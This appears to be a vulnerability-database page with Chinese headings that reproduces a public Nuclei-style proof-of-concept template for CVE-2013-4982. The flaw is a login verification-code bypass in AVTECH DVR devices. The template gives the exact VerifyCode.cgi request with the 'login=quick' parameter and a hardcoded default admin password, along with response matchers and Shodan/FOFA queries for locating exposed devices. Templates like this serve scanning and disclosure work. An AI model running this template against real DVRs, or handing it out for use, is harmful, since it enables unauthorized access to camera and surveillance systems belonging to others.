漏洞描述
AVTECH DVR products are vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.
CVE-2013-4982: AVTECH DVR - Login Verification Code Bypass
PoC代码[已公开]
id: CVE-2013-4982
info:
name: AVTECH DVR - Login Verification Code Bypass
author: ritikchaddha
severity: low
description: |
AVTECH DVR products are vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-4982
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5.0
cve-id: CVE-2013-4982
epss-score: 0.39617
epss-percentile: 0.97132
cwe-id: CWE-287
metadata:
verified: true
max-request: 1
shodan-query: title:"login" product:"Avtech"
fofa-query: app="AVTECH-视频监控"
tags: cve,cve2013,avtech,verify,bypass,iot,vuln
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/nobody/VerifyCode.cgi?account={{base64(username + ':' + password)}}&login=quick"
attack: pitchfork
payloads:
username:
- admin
password:
- linux321
matchers-condition: and
matchers:
- type: regex
regex:
- "^0.*\nOK.*"
- type: dsl
dsl:
- status_code == 200
- len(body) == 5
condition: and
# digest: 4a0a00473045022052c6ed47d71d23d466a68e926c5ecf6351886726c998d077fa096bcd581cad7a022100cdc8c55261b17e3909b39cf161acbf32964c62a923421fa95d050404d6ad3ad1:922c64590222798bb761d5b6d8e72950